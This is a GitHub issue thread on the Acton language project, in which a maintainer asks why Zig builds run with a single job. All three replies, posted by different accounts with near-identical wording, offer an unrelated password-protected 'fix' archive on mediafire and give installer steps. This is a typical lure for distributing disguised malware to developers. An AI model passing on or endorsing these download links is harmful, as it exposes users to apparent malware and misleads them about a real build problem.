### ISSUE TITLE
Verify Zig build concurrency

### ISSUE THREAD

**Issue by plajjan** [actonlang/acton#1880]
It feels like Zig is often running with a single worker / job, so concurrency of 1 when I really think it should be running 16 on my workstation. This is when it is invoked by acton.

- [ ] find reproduction case
- [ ] maybe look into zig detection logic for number of CPUs or so and debug print in builder?
- [ ] fix the thing if it needs fixing

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
